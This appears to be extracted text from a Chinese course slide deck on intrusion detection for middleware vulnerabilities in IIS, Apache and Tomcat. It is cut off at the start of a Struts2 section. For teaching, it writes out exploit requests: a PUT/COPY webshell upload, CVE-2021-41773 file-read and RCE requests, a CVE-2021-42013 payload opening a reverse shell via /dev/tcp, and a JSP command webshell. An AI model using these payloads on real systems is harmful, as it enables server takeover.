《网络攻防与协议分析》课件——1.关于漏洞后门防护的入侵检测配置.pptxVIP

关于漏洞后门防护的

入侵检测配置

1中间件漏洞

IIS解析漏洞IIS6.0版本，会将“1.asp;.ipg”这样的文件当作ASP文件解析。在计算机对文件扩展名的理解上来说，文件扩展名是以最后一个“.”的后面内容为据的，这个文件被网站过滤程序理解成了图片。而实际上，IIS会认为分号即是结尾，后面内容被“截断”了，认为这是ASP文件，于是产生了差异，差异即是不安全。OPTIONS/xHTTP1.1Host:探测是否允许PUT方法上传PUT/x.txtHTTP1.1Host:Content-Length:30%executerequest(“123456”)%#上传的内容上传一个txt文件COPY/x.txtHTTP1.1Host:Destination:/cmd.asp#将x.txt重命名为cmd.asp(由于解析漏洞)通过move或copy重命名文件

Apache解析漏洞因为Apache认为一个文件可以拥有多个扩展名，哪怕没有文件名，也可以拥有多个扩展名。Apache认为应该从右到左开始判断解析方法的。如果最右侧的扩展名为不可识别的，就继续往左判断，直到判断到文件名为止。

Apache漏洞-CVE-2021-41773ApacheHTTPServer2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。GET/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd文件读取POST/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/shHTTP/1.1Host:7:53238Content-Type:text/plainContent-Length:8echo;idRCE命令执行

Apache漏洞-CVE-2021-42013ApacheHTTPServer2.4.50中针对CVE-2021-41773的修复不够充分。攻击者可以使用路径遍历攻击将URL映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护，则这些请求可能会成功。如果还为这些别名路径启用了CGI脚本，则这可能允许远程代码执行。POST/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/shHTTP/1.1Host::29045Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection:closeContent-Type:application/x-www-form-urlencodedecho;echoexec/bin/sh0/dev/tcp/x.x.x.x/88881020/tmp/a.shRCE命令执行

Tomcat解析漏洞-CVE-2017-12615CVE-2017-12615漏洞称之为TomcatPUT方法任意写文件漏洞，类似IIS的PUT上传漏洞。该漏洞可以利用HTTP的PUT方法直接上传webshell到目标服务器，从而获取权限。该漏洞是高危漏洞，在Tomcat的web.xml默认情况下不存在该漏洞，但是一单开发者或者运维人员手动讲web.xml中的readonly设置为false，可以通过PUT/DELETE进行文件操控。PUT/shell.jsp/HTTP/1.1Host:Content-Length:10%Processprocess=Runtime.getRuntime().exec(request.getParameter(cmd));%POC

2框架漏洞

Struts2-S2-01漏洞原理：该漏洞因用户提交表单数据